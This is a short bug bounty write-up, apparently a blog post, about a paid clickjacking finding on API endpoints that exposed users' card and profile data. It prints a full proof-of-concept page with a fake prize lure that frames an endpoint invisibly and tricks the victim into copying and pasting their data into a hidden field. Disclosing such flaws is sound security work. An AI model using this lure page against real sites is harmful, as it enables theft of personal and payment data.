$1800 worth Clickjacking

Osama Avvan
Jun 21 · 2 min read

In this writeup, I will talk about how I earned a total of $1800 by exploiting Clickjacking on pages where User sensitive information was disclosed, It was a private program on Bugcorwd.

So there were some API endpoints, which were disclosing User Information like Credit Card Data, Email, Name, Phone, Address, User Id, etc.

https://example.com/api/v1/wallet/payments?language=en

https://example.com/api/v1/profile/personal

https://example.com/api/v1/wallet/address/shipping

https://www.example.com/no-cache/profileSystem/getProfile

Now as there was no X-FRAME Header on any of these endpoints so I was able to load them in an IFRAME.

Now I had to create an HTML page to trick the user into stealing their Information. So I created an HTML page.

HTML CODE

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>

<div id=”parent”>

<center><h1 style=”color: blue; text-decoration: underline;”>Lucky Draw to Win $100</h1></center>

<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>

<div style=”border: 2px solid gray;”>
<iframe src=”https://example.com/api/v1/wallet/payments?language=en" width=”100%” style=”opacity: 0.01"></iframe>

</div>

<h3>Click inside the box and press CTRL+V</h3>
<input type=”password” name=”” size=”1">
<! — <textarea rows=”1" cols=”1" style=”resize: none;”></textarea> →
<br>
<button id=”btn”>Click to Win</button>

</div>

</body>

<script>
document.querySelector(“#btn”).onclick = function() {
console.log(document.querySelector(“input”).value)
alert(“Congratulation! You have won $100”)
}
</script>

</html>

Now after performing all the steps when the user will click on the Button, his/her information will be logged in the console.

So that was it, Thank you for Reading.

Osama Avvan

Written by

Security Researcher, ❤️ To Code. Find me at: https://twitter.com/osamaavvan https://facebook.com/cyber.spidey